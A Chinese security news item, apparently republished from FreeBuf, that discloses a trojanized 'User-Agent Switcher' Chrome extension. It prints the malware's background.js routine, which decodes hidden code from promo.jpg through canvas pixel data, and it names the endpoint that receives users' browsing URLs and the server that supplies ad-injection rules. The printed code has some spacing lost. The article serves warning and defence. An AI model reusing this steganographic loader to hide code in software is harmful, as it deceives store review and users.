信息来源:FreeBuf
刚刚曝出的消息,Chrome商店搜索User-Agent Switcher,排名第一的插件居然是一款木马程序!而这款工具,很多安全技术人员也都在使用。
这款插件的表面功能是使Chrome可以转换为别的浏览器进行访问,如IE、Safari、360甚至iOS、 Android等移动浏览器,方便用户进行测试。此外,User-Agent Switcher还可以修改浏览器的UA,支持自动切换模式,让Chrome始终用指定的UA去访问某些网站。
但是,这款插件其实是一个包含恶意代码的木马程序。打开谷歌应用商店(插件地址),可以看到其用户数超过45万人,截至发稿共有1300多名用户对其进行了评价,平均评分4.38颗星。
插件截图
为了绕过Chrome的审核策略,其作者把恶意代码隐藏在了promo.jpg里。插件的background.js第80行代码,可以从图片里解密出恶意代码并执行。
t.prototype.Vh=function(t,e){
if(""==='../promo.jpg')return"";
void0===t&&(t='../promo.jpg'),t.length&&(t=r.Wk(t)),e=e||{};
varn=this.ET,
i=e.mp||n.mp,
o=e.Tv||n.Tv,
h=e.At||n.At,
a=r.Yb(Math.pow(2,i)),
f=(e.WC||n.WC,e.TY||n.TY),
u=document.createElement("canvas"),
p=u.getContext("2d");
if(u.style.display="none",u.width=e.width||t.width,u.height=e.width||t.height,0===u.width||0===u.height)return"";
e.height&&e.width?p.drawImage(t,0,0,e.width,e.height):p.drawImage(t,0,0);
varc=p.getImageData(0,0,u.width,u.height),
d=c.data,
g=[];
if(c.data.every(function(t){
return0===t
}))return"";
varm,s;
if(1===o)
for(m=3,s=!1;!s&&m<d.length&&!s;m+=4)s=f(d,m,o),s||g.push(d[m]-(255-a+1));
varv="",
w=0,
y=0,
l=Math.pow(2,h)-1;
for(m=0;m<g.length;m+=1)w+=g[m]<<y,y+=i,y>=h&&(v+=String.fromCharCode(w&l),y%=h,w=g[m]>>i-y);
returnv.length<13?"":(0!==w&&(v+=String.fromCharCode(w&l)),v) }
只要执行这段代码,插件就会把你浏览器打开的每个页面的url信息加密发送到这个地址(https://uaswitcher.org/logic/page/data)。另外,该插件还会从地址(http://api.data-monitor.info/api/bhrule?sub=116)获取推广链接规则,当用户打开符合规则的网站时,就会在当前页面植入广告甚至恶意代码。
据悉,该作者还在谷歌应用商店发布了如下几个插件,其安全性同样值得怀疑:
https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm
https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah
https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa
https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg
请大家检查一下自己的浏览器,如有发现安装,请尽快卸载。
